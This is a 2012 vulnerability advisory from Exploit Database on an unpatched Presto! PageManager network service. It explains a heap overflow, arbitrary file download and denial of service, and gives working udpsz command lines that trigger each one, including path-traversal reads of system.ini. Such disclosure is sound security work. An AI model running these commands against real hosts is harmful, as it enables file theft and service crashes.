presto! pagemanager 9.01 – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Luigi Auriemma
  日期： 2012-03-14
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/18600/

• #######################################################################
  
   Luigi Auriemma
  
  Application:Presto! PageManager
  http://www.newsoftinc.com/products/product_page.php?P_Id=5
  Versions: <= 9.01
  Platforms:Windows, MacOSX
  Bugs: A] Heap-overflow
  B] Arbitray files downloading
  C] Denial of Service
  Exploitation: remote
  Date: 14 Mar 2012
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bugs
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  Presto! PageManager is a management software for scanners and it's
  provided by default also by some hardware vendors (like Epson).
  
  It's bundled with a (manual) server program called NetGroup for remote
  files transfer:
  "The Network Group function helps you exchange files with your group
  members. Everyone in the working group should have Presto! PageManager
  running."
  
  
  #######################################################################
  
  =======
  2) Bugs
  =======
  
  ----------------
  A] Heap-overflow
  ----------------
  
  Buffer overflow on port 2502 while copying of the message string into a
  small heap buffer:
  
  004151BE|. 33C0 XOR EAX,EAX
  004151C0|. F2:AEREPNE SCAS BYTE PTR ES:[EDI]; strlen
  004151C2|. F7D1 NOT ECX
  004151C4|. 2BF9 SUB EDI,ECX
  004151C6|. 6A FFPUSH -1
  004151C8|. 8BC1 MOV EAX,ECX
  004151CA|. 8BF7 MOV ESI,EDI
  004151CC|. 8BFA MOV EDI,EDX
  004151CE|. C1E9 02SHR ECX,2 ; heap overflow
  004151D1|. F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  004151D3|. 8BC8 MOV ECX,EAX
  004151D5|. 83E1 03AND ECX,3
  004151D8|. F3:A4REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
  004151DA|. 8D4C24 14LEA ECX,DWORD PTR SS:[ESP+14]
  004151DE|. E8 1B370000CALL <JMP.&MFC42.#5572>
  004151E3|. 8B5424 10MOV EDX,DWORD PTR SS:[ESP+10]
  004151E7|. 8D4C24 2CLEA ECX,DWORD PTR SS:[ESP+2C]
  004151EB|. 51 PUSH ECX
  004151EC|. 52 PUSH EDX
  004151ED|. E8 56350000CALL <JMP.&PMCommon._GetFileExtName>
  004151F2|. BE 94014200MOV ESI,NetGroup.00420194 ;ASCII ".NSOFT"
  
  
  -----------------------------
  B] Arbitray files downloading
  -----------------------------
  
  The software allows downloading any file.
  
  
  --------------------
  C] Denial of Service
  --------------------
  
  Just a simple (auto)termination caused by the impossibility of
  allocating the amount of memory specified by the client.
  
  There is also a "division by zero" when specifying a file size of 0
  bytes.
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip
  
  A]
  udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff
  just a quick test, exist better ways that show code execution
  
  B]
  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
  or
  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
  
  C]
  udpsz -T -C "00010000 ffffffff" SERVER 2501 -1
  or
  udpsz -T -C "00000100 ffffffff" SERVER 2502 -1
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################